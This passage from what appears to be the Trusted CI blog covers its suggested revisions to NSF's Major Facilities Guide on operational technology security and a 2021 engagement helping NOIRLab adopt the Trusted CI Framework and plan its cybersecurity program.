Beginning in 2014, Trusted CI partnered with the NSF Large Facilities Office in providing draft material for what became the first cybersecurity section for the then-titled Large Facilities Manual. Our work drew broadly from our cybersecurity experience and expertise, and specifically from our collaborations with the Major Facilities themselves. Since that original section’s publication, we have used the public comment process to suggest refinements.

Endnotes

[1] The name change reflects the fact that the document applies to mid-scale projects as well as Major Facilities. (See, p.i.)

[2] Operational technology (OT) / cyber physical systems (CPS) is the focus of Trusted CI’s 2022 annual challenge. Read more here.    

[3] We submitted the following rationale to NSF:

“While the MFG references controls for ICS and SCADA systems in Section 6.3.5.3, a clarification of the scope of “information systems” is warranted. Our work with Large/Major Facilities since 2013 suggests that some community stakeholders believe cybersecurity and related responsibilities are scoped only to traditional IT, and do not include OT. 

“If reflected in the scoping and resourcing of their cybersecurity programs, this misunderstanding and exclusion of OT cybersecurity considerations poses a serious risk to facility research missions. These missions frequently rely heavily on operational technology. The availability, functionality, and efficacy of scientific instruments (e.g., telescopes) frequently depend on both operational technologies and traditional information technologies. These technologies are increasingly architected as interconnected systems of systems composed of both traditional IT and OT. Cyberthreats to these operational technologies are real [FN1] and attacks that impact them can be executed both directly and through connected traditional IT systems. The gravity and impact of cyberthreats to OT is recognized at the federal level and action to address these threats is called out explicitly as a priority. [FN2,FN3,FN4] 

“This addition also will help clarify that NSF’s guidance is aligned with the federal definition of cybersecurity. [FN5]”

[FN1] See, https://www.dragos.com/resource/dragos-releases-annual-industrial-control-systems-cybersecurity-2020-year-in-review-report/.

[FN2] See, e.g., NATIONAL SECURITY AGENCY CYBERSECURITY REPORT: NSA/CSS Technical Cyber Threat Framework v2, p.2. Available at https://media.defense.gov/2019/Jul/16/2002158108/-1/-1/0/CTR_NSA-CSS-TECHNICAL-CYBER-THREAT-FRAMEWORK_V2.PDF.  

[FN3] See also, NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems - Alert (AA20-205A), Original release date: July 23, 2020. Available at https://us-cert.cisa.gov/ncas/alerts/aa20-205a.

[FN4] See also, NSA press release, “Protect Operational Technologies and Control Systems against Cyber Attacks.” Available at https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2285423/protect-operational-technologies-and-control-systems-against-cyber-attacks/

[FN5] https://fas.org/irp/offdocs/nspd/nspd-54.pdf.

Friday, January 28, 2022

NOIRLab Engagement Focuses on Framework Adoption, Assessment, and Strategic Planning

Over the course of 2021, Trusted CI and NOIRLab (NSF Major Facility) collaborated on an engagement to assist NOIRLab in formally adopting and aligning to the Trusted CI Framework. NOIRLab is the preeminent US national center for ground-based, nighttime optical and infrared astronomy. 

In the first half of 2021, Trusted CI conducted an assessment of NOIRLab’s cybersecurity program using the Trusted CI Framework. The assessment culminated in the delivery of an Assessment Report [1] describing NOIRLab’s cybersecurity program and recommendations to improve. The report also included an “implementation rating” for each of the 16 Trusted CI Framework Musts. 

In the second half of 2021, NOIRLab and Trusted CI continued the engagement with a series of monthly workshops designed to aid NOIRLab in implementing the highest priority recommendations from the Assessment Report. These workshops allowed Trusted CI to continue to provide input and guidance while NOIRLab tackled the most pressing changes needed to its cybersecurity program.  

Engagement Outcomes

  • NOIRLab is among the first Major Facilities to formally adopt the Trusted CI Framework. NOIRLab’s adoption is formalized in policy.
  • NOIRLab received an Assessment Report detailing Strengths and Opportunities, Challenges and Barriers, and discrete recommendations to improve their cybersecurity program.
  • NOIRLab developed an updated Master Information Security Policy and Procedures document, aligning with Trusted CI’s updated template.
  • NOIRLab adopted and began using the CIS Controls as its baseline control set.
  • NOIRLab developed a Cybersecurity Program Strategic Plan (CPSP). The CPSP described NOIRLab’s mission, how NOIRLab’s cybersecurity program supports its mission, a cybersecurity strategy, and a timeline detailing the strategic outcomes the cybersecurity program will plan to achieve over the next three years. 
  • NORILab’s strategic planning efforts dramatically helped Trusted CI refine its cybersecurity strategic planning approach and will lead to updates to the CPSP template.
  • The success of the monthly workshops led to the development of a new Trusted CI “cohort” engagement approach to support scaling Framework adoption and implementation.

John Maclean, the Director of Center Operations Services for NOIRLab, said the following of the engagement:

“Trusted CI has given us a Framework, appropriate to our environment, with which to build our cybersecurity program. It allows us to do this in a manner that balances scientific productivity against organizational risk in a cost effective manner.”

Chris Morrison, the engagement lead for NOIRLab, said the following of the engagement:

“As we continue to merge technologies and processes throughout our constituent programs, the Framework assessment helped us focus our cybersecurity effort and think strategically. The programmatic focus on the initiatives is helping us make cybersecurity visible and understandable across the organization. The follow-on activities will unquestionably support this systematic deployment and facilitate communication and decision-making with NOIRLab’s senior leadership. We are incredibly pleased with the process and outcome of the engagement with Trusted CI, and we now have a clear and prioritized path forward.”


[1] This assessment was based on the PACT cybersecurity assessment methodology. PACT was developed by the Center for Applied Cybersecurity Research in collaboration with the US Navy. For more information about PACT, see https://cacr.iu.edu/pact/index.html.